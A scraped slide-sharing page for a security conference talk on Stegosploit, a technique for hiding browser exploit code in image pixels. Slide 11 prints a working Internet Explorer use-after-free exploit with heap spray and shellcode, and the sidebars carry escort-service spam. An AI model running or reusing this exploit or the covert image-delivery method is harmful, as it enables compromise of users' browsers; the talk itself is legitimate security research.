How Functions WorkHow Functions Work
How Functions Work
ย 
Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015
ย 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A Primer
ย 
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
ย 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMS
ย 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
ย 

Similar to Stegosploit - NCSC ONE 2016

OWC 2012 (Open Web Camp)
OWC 2012 (Open Web Camp)OWC 2012 (Open Web Camp)
OWC 2012 (Open Web Camp)
Oswald Campesato
ย 
How to build a html5 websites.v1
How to build a html5 websites.v1How to build a html5 websites.v1
How to build a html5 websites.v1
Bitla Software
ย 
1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf
1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf
1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf
alokopticalswatchco0
ย 
Webgl para JavaScripters
Webgl para JavaScriptersWebgl para JavaScripters
Webgl para JavaScripters
gerbille
ย 
GCD in Action
GCD in ActionGCD in Action
GCD in Action
Nigel Barber
ย 

Similar to Stegosploit - NCSC ONE 2016 (20)

Intro to computer vision in .net
Intro to computer vision in .netIntro to computer vision in .net
Intro to computer vision in .net
ย 
Intro to HTML5
Intro to HTML5Intro to HTML5
Intro to HTML5
ย 
Building Native Apps- A Digital Canvas for Coders and Designers with Walter Luh
Building Native Apps- A Digital Canvas for Coders and Designers with Walter LuhBuilding Native Apps- A Digital Canvas for Coders and Designers with Walter Luh
Building Native Apps- A Digital Canvas for Coders and Designers with Walter Luh
ย 
I Can't Believe It's Not Flash
I Can't Believe It's Not FlashI Can't Believe It's Not Flash
I Can't Believe It's Not Flash
ย 
SVG's and their potential for programmatic art
SVG's and their potential for programmatic artSVG's and their potential for programmatic art
SVG's and their potential for programmatic art
ย 
RaphaรซlJS magic
RaphaรซlJS magicRaphaรซlJS magic
RaphaรซlJS magic
ย 
OWC 2012 (Open Web Camp)
OWC 2012 (Open Web Camp)OWC 2012 (Open Web Camp)
OWC 2012 (Open Web Camp)
ย 
How to build a html5 websites.v1
How to build a html5 websites.v1How to build a html5 websites.v1
How to build a html5 websites.v1
ย 
1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf
1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf
1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf
ย 
CS101- Introduction to Computing- Lecture 41
CS101- Introduction to Computing- Lecture 41CS101- Introduction to Computing- Lecture 41
CS101- Introduction to Computing- Lecture 41
ย 
Browsers with Wings
Browsers with WingsBrowsers with Wings
Browsers with Wings
ย 
Computer vision Nebraska (Nebraska Code)
Computer vision Nebraska (Nebraska Code)Computer vision Nebraska (Nebraska Code)
Computer vision Nebraska (Nebraska Code)
ย 
D3.js and SVG
D3.js and SVGD3.js and SVG
D3.js and SVG
ย 
Making Games in WebGL - Aro Wierzbowski & Tomasz Szepczyล„ski
Making Games in WebGL - Aro Wierzbowski & Tomasz Szepczyล„skiMaking Games in WebGL - Aro Wierzbowski & Tomasz Szepczyล„ski
Making Games in WebGL - Aro Wierzbowski & Tomasz Szepczyล„ski
ย 
JavaOne 2009 - 2d Vector Graphics in the browser with Canvas and SVG
JavaOne 2009 - 2d Vector Graphics in the browser with Canvas and SVGJavaOne 2009 - 2d Vector Graphics in the browser with Canvas and SVG
JavaOne 2009 - 2d Vector Graphics in the browser with Canvas and SVG
ย 
HTML5: where flash isn't needed anymore
HTML5: where flash isn't needed anymoreHTML5: where flash isn't needed anymore
HTML5: where flash isn't needed anymore
ย 
Webgl para JavaScripters
Webgl para JavaScriptersWebgl para JavaScripters
Webgl para JavaScripters
ย 
I phoneๅ‹‰ๅผทไผš (2011.11.23)
I phoneๅ‹‰ๅผทไผš (2011.11.23)I phoneๅ‹‰ๅผทไผš (2011.11.23)
I phoneๅ‹‰ๅผทไผš (2011.11.23)
ย 
GCD in Action
GCD in ActionGCD in Action
GCD in Action
ย 
ะปัƒะบัŒัะฝั‡ะตะฝะบะพ ะป.ะฐ. ะฟะพั 10ะฐ
ะปัƒะบัŒัะฝั‡ะตะฝะบะพ ะป.ะฐ. ะฟะพั 10ะฐะปัƒะบัŒัะฝั‡ะตะฝะบะพ ะป.ะฐ. ะฟะพั 10ะฐ
ะปัƒะบัŒัะฝั‡ะตะฝะบะพ ะป.ะฐ. ะฟะพั 10ะฐ
ย 

More from Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
Saumil Shah
ย 

More from Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
ย 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
ย 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
ย 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
ย 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
ย 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
ย 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
ย 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
ย 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
ย 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
ย 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
ย 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
ย 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
ย 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
ย 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
ย 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
ย 
Schrรถdinger's ARM Assembly
Schrรถdinger's ARM AssemblySchrรถdinger's ARM Assembly
Schrรถdinger's ARM Assembly
ย 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
ย 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
ย 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
ย 

Recently uploaded

Busty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort Service
Busty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort ServiceBusty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort Service
Busty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort Service
Delhi Call girls
ย 
VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...
VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...
VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
ย 
Call Now โ˜Ž 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
Call Now โ˜Ž 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.Call Now โ˜Ž 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
Call Now โ˜Ž 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
soniya singh
ย 
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
SUHANI PANDEY
ย 
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
Call Girls in Nagpur High Profile Call Girls
ย 
Lucknow โคCALL GIRL 88759*99948 โคCALL GIRLS IN Lucknow ESCORT SERVICEโคCALL GIRL
Lucknow โคCALL GIRL 88759*99948 โคCALL GIRLS IN Lucknow ESCORT SERVICEโคCALL GIRLLucknow โคCALL GIRL 88759*99948 โคCALL GIRLS IN Lucknow ESCORT SERVICEโคCALL GIRL
Lucknow โคCALL GIRL 88759*99948 โคCALL GIRLS IN Lucknow ESCORT SERVICEโคCALL GIRL
imonikaupta
ย 
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
dharasingh5698
ย 
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
singhpriety023
ย 
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
tanu pandey
ย 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
SUHANI PANDEY
ย 
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
SUHANI PANDEY
ย 
Call Girls in Prashant Vihar, Delhi ๐Ÿ’ฏ Call Us ๐Ÿ”9953056974 ๐Ÿ” Escort Service
Call Girls in Prashant Vihar, Delhi ๐Ÿ’ฏ Call Us ๐Ÿ”9953056974 ๐Ÿ” Escort ServiceCall Girls in Prashant Vihar, Delhi ๐Ÿ’ฏ Call Us ๐Ÿ”9953056974 ๐Ÿ” Escort Service
Call Girls in Prashant Vihar, Delhi ๐Ÿ’ฏ Call Us ๐Ÿ”9953056974 ๐Ÿ” Escort Service
9953056974 Low Rate Call Girls In Saket, Delhi NCR
ย 
Call Now โ˜Ž 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now โ˜Ž 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.Call Now โ˜Ž 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now โ˜Ž 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
soniya singh
ย 
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
tanu pandey
ย 
Enjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort Service
Enjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort ServiceEnjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort Service
Enjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort Service
Delhi Call girls
ย 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
tanu pandey
ย 
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
SUHANI PANDEY
ย 

Recently uploaded (20)

Busty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort Service
Busty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort ServiceBusty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort Service
Busty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort Service
ย 
VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...
VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...
VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...
ย 
Call Now โ˜Ž 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
Call Now โ˜Ž 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.Call Now โ˜Ž 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
Call Now โ˜Ž 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
ย 
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
ย 
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
ย 
Lucknow โคCALL GIRL 88759*99948 โคCALL GIRLS IN Lucknow ESCORT SERVICEโคCALL GIRL
Lucknow โคCALL GIRL 88759*99948 โคCALL GIRLS IN Lucknow ESCORT SERVICEโคCALL GIRLLucknow โคCALL GIRL 88759*99948 โคCALL GIRLS IN Lucknow ESCORT SERVICEโคCALL GIRL
Lucknow โคCALL GIRL 88759*99948 โคCALL GIRLS IN Lucknow ESCORT SERVICEโคCALL GIRL
ย 
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in DubaiRussian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
ย 
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableCall Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
ย 
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
ย 
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
ย 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
ย 
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
ย 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
ย 
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
ย 
Call Girls in Prashant Vihar, Delhi ๐Ÿ’ฏ Call Us ๐Ÿ”9953056974 ๐Ÿ” Escort Service
Call Girls in Prashant Vihar, Delhi ๐Ÿ’ฏ Call Us ๐Ÿ”9953056974 ๐Ÿ” Escort ServiceCall Girls in Prashant Vihar, Delhi ๐Ÿ’ฏ Call Us ๐Ÿ”9953056974 ๐Ÿ” Escort Service
Call Girls in Prashant Vihar, Delhi ๐Ÿ’ฏ Call Us ๐Ÿ”9953056974 ๐Ÿ” Escort Service
ย 
Call Now โ˜Ž 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now โ˜Ž 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.Call Now โ˜Ž 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now โ˜Ž 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
ย 
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
ย 
Enjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort Service
Enjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort ServiceEnjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort Service
Enjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort Service
ย 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
ย 
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
ย 

Stegosploit - NCSC ONE 2016

  • 1. NETSQUARE PAINTING AN EXPLOIT IN AN IMAGE SAUMIL SHAH NCSC ONE 2016 STEGOSPLOIT
  • 2. NETSQUARE @therealsaumil saumilshah hacker, trainer, speaker, author, photographer educating, entertaining and exasperating audiences since 1999. Saumil Shah CEO, Net-Square NETSQUARE
  • 3. NETSQUARE A good exploit is one that is delivered in style
  • 4. NETSQUARE Agenda โ€ขโ€ฏ Stegosploit design goals โ€ขโ€ฏ Stegosploit-ing an exploit โ€ขโ€ฏ Steganography techniques โ€ขโ€ฏ The decoder โ€ขโ€ฏ Polyglot Images โ€ขโ€ฏ Conclusions
  • 5. NETSQUARENETSQUARE Stegosploit Design Goals โ€ขโ€ฏ Only VALID images on network and disk. โ€ขโ€ฏ Exploit code hidden in pixels. โ€ขโ€ฏ Self contained decoder code. โ€ขโ€ฏ Exploit automatically decoded and triggered upon loading... โ€ขโ€ฏ ...all with just ONE IMAGE, โ€ขโ€ฏ in STYLE!
  • 7. NETSQUARE Polyglots Two or more data formats in a single container... ...that co-exist happily without breaking each other's spec or syntax.
  • 8. NETSQUARE Stegosploit-ing a browser exploit IMAJS STEGO- DECODER JAVASCRIPT TARGET BROWSER POLYGLOT PIXEL ENCODER EXPLOIT CODE IMAGE ENCODED IMAGE Case study: CVE-2014-0282 -โ€ฏ IE CInput Use-After-Free -โ€ฏ hidden in a JPG Case study: CVE-2013-1690 -โ€ฏ FF onreadystatechange UAF -โ€ฏ hidden in a PNG
  • 9. NETSQUARE Step 1. Hiding the Exploit Code in the Image PIXEL ENCODER EXPLOIT CODE IMAGE ENCODED IMAGE
  • 10. NETSQUARE Hiding an Exploit in an Image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . "SAUMIL" = 01010011 01000001 01010101 01001101 01001001 01001100
  • 11. NETSQUARE ganesha.jpg Hiding an Exploit in an Image function H5(){this.d=[];this.m=new Array();this.f=new Array()}H5.prototype.flatten=function(){for(var f=0;f<this.d.length;f+ +){var n=this.d[f];if(typeof(n)=='number'){var c=n.toString(16);while(c.length<8){c='0'+c}var l=function(a) {return(parseInt(c.substr(a,2),16))};var g=l(6),h=l(4),k=l(2),m=l(0);this.f.push(g);this.f.push(h);this.f.push(k);this.f.push(m)}if(typeof(n)=='string'){for(var d=0;d<n.length;d++){this.f.push(n.charCodeAt(d))}}}};H5.prototype.fill=function(a){for(var c=0,b=0;c<a.data.length;c++,b ++){if(b>=8192){b=0}a.data[c]=(b<this.f.length)?this.f[b]:255}};H5.prototype.spray=function(d){this.flatten();for(var b=0;b<d;b++){var c=document.createElement('canvas');c.width=131072;c.height=1;var a=c.getContext('2d').createImageData(c.width,c.height);this.fill(a);this.m[b]=a}};H5.prototype.setData=function(a) {this.d=a};var flag=false;var heap=new H5();try{location.href='ms-help:'}catch(e){}function spray(){var a='xfc xe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4a x26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3c x01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8b x01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8b x58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5a x51xffxe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68x31x8bx6fx87xffxd5xbb xf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xff xd5x63x61x6cx63x2ex65x78x65x00';var c=[];for(var b=0;b<1104;b+=4){c.push(1371756628)} c.push(1371756627);c.push(1371351263);var f=[1371756626,215,2147353344,1371367674,202122408,4294967295,202122400,202122404,64,202116108,2021212 48,16384];var d=c.concat(f);d.push(a);heap.setData(d);heap.spray(256)}function changer(){var c=new Array();for(var a=0;a<100;a++){c.push(document.createElement('img'))}if(flag) {document.getElementById('fm').innerHTML='';CollectGarbage();var b='u2020u0c0c';for(var a=4;a<110;a+=2){b +='u4242'}for(var a=0;a<c.length;a++){c[a].title=b}}}function run() {spray();document.getElementById('c2').checked=true;document.getElementById('c2').onpropertychange=changer;flag= true;document.getElementById('fm').reset()}setTimeout(run,1000); IE Use-After-Free CVE-2014-0282
  • 12. NETSQUARE 1 pixel = 8 bits (grayscale) The "Bit Layer" View 7โ€ฏ 6 5 4 3 2 1 0 | | MSB LSB
  • 13. NETSQUARE more shape less detail 7 6 5 4 3 2 1 0 less shape more detail The "Bit Layer" View
  • 15. NETSQUARE 7 6 5 4 3 2 1 0
  • 16. NETSQUARE Exploit code converted to bitstream. Pixel bits of layer 7 are overwritten with exploit bitstream. Encoding at Bit Layer 7 7 6 5 4 3 2 1 0 | | MSB LSB
  • 17. Encoding data at bit layer 7 Signi๏ฌcant visual aberration
  • 18. NETSQUARE Exploit code converted to bitstream. Pixel bits of layer 2 are overwritten with exploit bitstream. Encoding at Bit Layer 2 7 6 5 4 3 2 1 0 | | MSB LSB
  • 19. Encoding data at bit layer 2 No perceptible visual aberration
  • 20. NETSQUARE Encoding on JPG vs PNG โ€ขโ€ฏ JPG = lossy compression โ€ขโ€ฏ Pixels approximated to nearest neighbours โ€ขโ€ฏ Multi-pass encoding โ€ขโ€ฏ Min. layer = 2 or 3 โ€ขโ€ฏ Browser specific JPEG encoders โ€ขโ€ฏ PNG = lossless compression โ€ขโ€ฏ Negligible visual distortion in the image โ€ขโ€ฏ Single pass encoding โ€ขโ€ฏ Min. layer = 0 โ€ขโ€ฏ Independent of browser's PNG encoder
  • 21. NETSQUARE Step 2. Decoding the encoded Pixel Data ? STEGO- DECODER JAVASCRIPT ENCODED IMAGE
  • 22. NETSQUARE HTML5 CANVAS to the rescue! โ€ขโ€ฏ In-browser decoding of steganographically encoded images. โ€ขโ€ฏ Read image pixel data using JS. โ€ขโ€ฏ Rebuild JS exploit code from pixel data, in memory. โ€ขโ€ฏ Simple array and bit manipulation operations.
